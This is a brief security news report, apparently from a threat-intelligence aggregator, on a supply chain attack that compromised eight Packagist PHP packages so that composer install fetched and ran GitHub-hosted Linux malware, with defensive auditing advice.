Threats

Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware

A supply chain attack targeting the PHP ecosystem compromised eight packages on Packagist, the primary package repository for PHP. The attackers embedded malicious scripts in package.json files that, during composer install operations, downloaded and executed Linux malware binaries hosted on GitHub. This technique exploits the trust relationship between developer workstations, package managers, and code hosting platforms to bypass network security controls — the malware originates from a trusted domain and is fetched during what appears to be a normal dependency installation. The attack demonstrates the accelerating expansion of supply chain compromise techniques beyond the npm and PyPI ecosystems that have seen the bulk of recent attacks. PHP development teams should audit their composer.json and package.json files for unexpected scripts and implement dependency integrity verification.

View on Graph

Overview

  • A supply chain attack targeting the PHP ecosystem compromised eight packages on Packagist, the primary package repository for PHP.
  • The attackers embedded malicious scripts in package.json files that, during composer install operations, downloaded and executed Linux malware binaries hosted on GitHub.
  • This technique exploits the trust relationship between developer workstations, package managers, and code hosting platforms to bypass network security controls — the malware originates from a trusted domain and is fetched during what appears to be a normal dependency installation.
  • The attack demonstrates the accelerating expansion of supply chain compromise techniques beyond the npm and PyPI ecosystems that have seen the bulk of recent attacks.
  • PHP development teams should audit their composer.json and package.json files for unexpected scripts and implement dependency integrity verification.

Sources